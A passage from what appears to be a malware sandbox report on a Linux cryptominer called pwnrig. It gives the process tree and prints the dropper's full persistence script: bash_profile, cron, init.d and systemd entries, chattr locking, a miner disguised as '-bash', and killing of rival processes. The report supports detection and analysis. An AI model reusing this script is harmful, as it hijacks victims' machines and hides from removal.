2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
  2⤵
  - Writes file to tmp directory
  PID:3372
- - /usr/bin/id
    id -u
    3⤵
    PID:3373
- - /usr/bin/id
    id -u
    3⤵
    PID:3376
- - /usr/bin/chattr
    chattr -i -a /bin/bprofr "~/.bash_profile"
    3⤵
    PID:3377
- - /usr/bin/rm
    rm -rf /bin/bprofr
    3⤵
    PID:3378
- - /usr/bin/sed
    sed -i /bprofr/d "~/.bash_profile"
    3⤵
    PID:3379
- - /usr/bin/cp
    cp -f -r -- /tmp/service-agent /bin/bprofr
    3⤵
    - Writes file to system bin folder
    PID:3380
- - /usr/bin/id
    id -u
    3⤵
    PID:3381
- - /usr/bin/chattr
    chattr +i +a /bin/bprofr "~/.bash_profile"
    3⤵
    - Attempts to change immutable files
    PID:3382
- - /usr/bin/mkdir
    mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
    3⤵
    PID:3383
- - /usr/bin/chattr
    chattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
    3⤵
    PID:3384
- - /usr/bin/rm
    rm -rf /bin/crondr
    3⤵
    PID:3385
- - /usr/bin/cp
    cp -f -r -- /tmp/service-agent /bin/crondr
    3⤵
    - Writes file to system bin folder
    PID:3386
- - /usr/bin/tee
    tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
    3⤵
    - Creates/modifies Cron job
    PID:3388
- - /usr/bin/sed
    sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
    3⤵
    - Creates/modifies Cron job
    PID:3389
- - /usr/bin/chmod
    chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
    3⤵
    PID:3390
- - /usr/bin/chattr
    chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
    3⤵
    PID:3391
- - /usr/bin/which
    which chkconfig
    3⤵
    PID:3392
- - /usr/bin/which
    which update-rc.d
    3⤵
    PID:3393
- - /usr/bin/chattr
    chattr -i -a /etc/init.d/pwnrig /bin/initdr
    3⤵
    PID:3394
- - /usr/sbin/update-rc.d
    update-rc.d -f pwnrig disable
    3⤵
    - Flushes firewall rules
    PID:3395
  - - /usr/local/sbin/systemctl
      systemctl --quiet disable pwnrig
      4⤵
      PID:3396
  - - /usr/local/bin/systemctl
      systemctl --quiet disable pwnrig
      4⤵
      PID:3396
  - - /usr/sbin/systemctl
      systemctl --quiet disable pwnrig
      4⤵
      PID:3396
  - - /usr/bin/systemctl
      systemctl --quiet disable pwnrig
      4⤵
      Reads EFI boot settings
      PID:3396
  - - /usr/local/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:3422
  - - /usr/local/bin/systemctl
      systemctl daemon-reload
      4⤵
      PID:3422
  - - /usr/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:3422
  - - /usr/bin/systemctl
      systemctl daemon-reload
      4⤵
      Reads EFI boot settings
      PID:3422
- - /usr/sbin/update-rc.d
    update-rc.d -f pwnrig remove
    3⤵
    PID:3448
  - - /usr/local/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:3449
  - - /usr/local/bin/systemctl
      systemctl daemon-reload
      4⤵
      PID:3449
  - - /usr/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:3449
  - - /usr/bin/systemctl
      systemctl daemon-reload
      4⤵
      Reads EFI boot settings
      PID:3449
- - /usr/bin/rm
    rm -rf /bin/initdr
    3⤵
    PID:3487
- - /usr/bin/cp
    cp -f -r -- /tmp/service-agent /bin/initdr
    3⤵
    - Writes file to system bin folder
    PID:3488
- - /usr/bin/tee
    tee /etc/init.d/pwnrig
    3⤵
    - Modifies init.d
    PID:3490
- - /usr/bin/sed
    sed -i "1 s/-e //" /etc/init.d/pwnrig
    3⤵
    - Modifies init.d
    PID:3491
- - /usr/bin/chmod
    chmod +x /etc/init.d/pwnrig /bin/initdr
    3⤵
    PID:3492
- - /usr/sbin/update-rc.d
    update-rc.d pwnrig defaults
    3⤵
    PID:3493
- - /usr/sbin/update-rc.d
    update-rc.d pwnrig enable
    3⤵
    PID:3528
  - - /usr/local/sbin/systemctl
      systemctl --quiet enable pwnrig
      4⤵
      PID:3529
  - - /usr/local/bin/systemctl
      systemctl --quiet enable pwnrig
      4⤵
      PID:3529
  - - /usr/sbin/systemctl
      systemctl --quiet enable pwnrig
      4⤵
      PID:3529
  - - /usr/bin/systemctl
      systemctl --quiet enable pwnrig
      4⤵
      Reads EFI boot settings
      PID:3529
  - - /usr/local/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:3530
  - - /usr/local/bin/systemctl
      systemctl daemon-reload
      4⤵
      PID:3530
  - - /usr/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:3530
  - - /usr/bin/systemctl
      systemctl daemon-reload
      4⤵
      PID:3530
- - /usr/bin/chattr
    chattr +i +a /etc/init.d/pwnrig /bin/initdr
    3⤵
    PID:3556
- - /usr/bin/which
    which systemctl
    3⤵
    PID:3557
- - /usr/bin/chattr
    chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
    3⤵
    PID:3558
- - /usr/bin/rm
    rm -rf /bin/sysdr
    3⤵
    PID:3559
- - /usr/bin/cp
    cp -f -r -- /tmp/service-agent /bin/sysdr
    3⤵
    - Writes file to system bin folder
    PID:3560
- - /usr/bin/tee
    tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
    3⤵
    - Modifies systemd
    PID:3562
- - /usr/bin/sed
    sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
    3⤵
    PID:3563
- - /usr/bin/chattr
    chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
    3⤵
    PID:3564
- - /usr/bin/systemctl
    systemctl enable pwnrige.service
    3⤵
    - Reads EFI boot settings
    PID:3565
- - /usr/bin/systemctl
    systemctl enable pwnrigl.service
    3⤵
    - Reads EFI boot settings
    PID:3591
- - /usr/bin/systemctl
    systemctl daemon-reload
    3⤵
    - Reads EFI boot settings
    PID:3623
- - /usr/bin/systemctl
    systemctl reload-or-restart pwnrige.service
    3⤵
    - Reads EFI boot settings
    PID:3651

/usr/bin/hostname
hostname -I
1⤵
PID:3337

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:3339

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:3344

/usr/bin/head
head -n 1
1⤵
PID:3343

/usr/bin/grep
grep "Port "
1⤵
PID:3342

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:3341

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:3353

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:3352

/usr/bin/cut
cut -d: -f2
1⤵
PID:3351

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:3350

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:3356

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:3359

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:3362

/tmp/service-agent
/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d
1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:3731
- /bin/sh
  sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
  2⤵
  PID:3755
- - /usr/bin/whoami
    whoami
    3⤵
    PID:3766
- - /usr/bin/hostname
    hostname
    3⤵
    PID:3767
- - /usr/bin/grep
    grep -c "^processor" /proc/cpuinfo
    3⤵
    - Checks CPU configuration
    PID:3768
- /bin/sh
  sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
  2⤵
  PID:3784
- - /usr/bin/awk
    awk "/[zZ]/ && !a[\$2]++ {print \$2}"
    3⤵
    PID:3786
- - /usr/bin/ps
    ps -A "-ostat,ppid"
    3⤵
    - Reads CPU attributes
    PID:3785
- - /usr/bin/id
    id -u
    3⤵
    PID:3788
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3791
- - /usr/bin/grep
    grep /etc/cron
    3⤵
    PID:3790
- - /usr/bin/ps
    ps x
    3⤵
    - Reads runtime system information
    PID:3789
- /bin/sh
  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
  2⤵
  PID:3793
- - /usr/bin/id
    id -u
    3⤵
    PID:3794
- - /usr/bin/awk
    awk "{if(\$3>30.0) print \$2}"
    3⤵
    PID:3799
- - /usr/bin/grep
    grep -v /usr/sbin/httpd
    3⤵
    PID:3798
- - /usr/bin/grep
    grep -v -- "-bash[[:space:]]*\$"
    3⤵
    PID:3797
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3796
- - /usr/bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:3795
- /bin/sh
  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
  2⤵
  PID:3801
- - /usr/bin/id
    id -u
    3⤵
    PID:3802

/usr/bin/hostname
hostname -I
1⤵
PID:3758

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:3760

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:3765

/usr/bin/head
head -n 1
1⤵
PID:3764

/usr/bin/grep
grep "Port "
1⤵
PID:3763

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:3762

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:3774

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:3773

/usr/bin/cut
cut -d: -f2
1⤵
PID:3772

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:3771

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:3777

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:3780

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:3783

/usr/bin/wc
wc -l
1⤵
PID:3808

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
1⤵
PID:3807

/usr/bin/grep
grep -- "-bash[[:space:]]*\$"
1⤵
PID:3806

/usr/bin/grep
grep -v grep
1⤵
PID:3805

/usr/bin/ps
ps aux
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:3804

/usr/bin/crontab
crontab -r
1⤵
PID:3845

/usr/bin/pkill
pkill -f .klibsystem5
1⤵
- Reads runtime system information
PID:3846

/usr/bin/pkill
pkill -f .klibsystem4
1⤵
- Reads runtime system information
PID:3847

/usr/bin/bash
bash -c "echo \"* * * * * /usr/local/share/.klibsystem5 >/dev/null 2>&1\" | crontab -"
1⤵
PID:3848
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:3850

/usr/bin/chattr
chattr -ia /etc/cron.d/.lib-knlib4
1⤵
PID:3851

/usr/bin/chattr
chattr +ia /etc/cron.d/.lib-knlib4
1⤵
PID:3852

/usr/bin/chattr
chattr -ia /var/spool/cron/.lib-knlib4
1⤵
PID:3853

/usr/bin/chattr
chattr +ia /var/spool/cron/.lib-knlib4
1⤵
PID:3854

/usr/bin/chattr
chattr -ia /etc/cron.hourly/.lib-knlib4
1⤵
PID:3855

/usr/bin/chattr
chattr +ia /etc/cron.hourly/.lib-knlib4
1⤵
PID:3856

/usr/bin/chattr
chattr -ia /etc/cron.daily/.lib-knlib4
1⤵
PID:3857

/usr/bin/chattr
chattr +ia /etc/cron.daily/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:3858

/usr/bin/chattr
chattr -ia /etc/cron.weekly/.lib-knlib4
1⤵
PID:3859

/usr/bin/chattr
chattr +ia /etc/cron.weekly/.lib-knlib4
1⤵
PID:3860

/usr/bin/chattr
chattr -ia /etc/cron.monthly/.lib-knlib4
1⤵
PID:3861

/usr/bin/chattr
chattr +ia /etc/cron.monthly/.lib-knlib4
1⤵
PID:3862

/usr/bin/chattr
chattr -ia /etc/anacrontab
1⤵
PID:3863

/usr/bin/chattr
chattr +ia /etc/anacrontab
1⤵
PID:3864

/tmp/sys-helper
/tmp/sys-helper
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:3865

/tmp/service-agent
/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:3866
- /bin/sh
  sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
  2⤵
  - Attempts to change immutable files
  PID:3867
- - /usr/bin/whoami
    whoami
    3⤵
    PID:3878
- - /usr/bin/hostname
    hostname
    3⤵
    PID:3879
- - /usr/bin/grep
    grep -c "^processor" /proc/cpuinfo
    3⤵
    - Checks CPU configuration
    PID:3880
- /bin/sh
  sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
  2⤵
  PID:3896
- - /usr/bin/awk
    awk "/[zZ]/ && !a[\$2]++ {print \$2}"
    3⤵
    PID:3898
- - /usr/bin/ps
    ps -A "-ostat,ppid"
    3⤵
    - Reads CPU attributes
    PID:3897
- - /usr/bin/id
    id -u
    3⤵
    PID:3900
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3903
- - /usr/bin/grep
    grep /etc/cron
    3⤵
    PID:3902
- - /usr/bin/ps
    ps x
    3⤵
    - Reads CPU attributes
    PID:3901
- /bin/sh
  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service 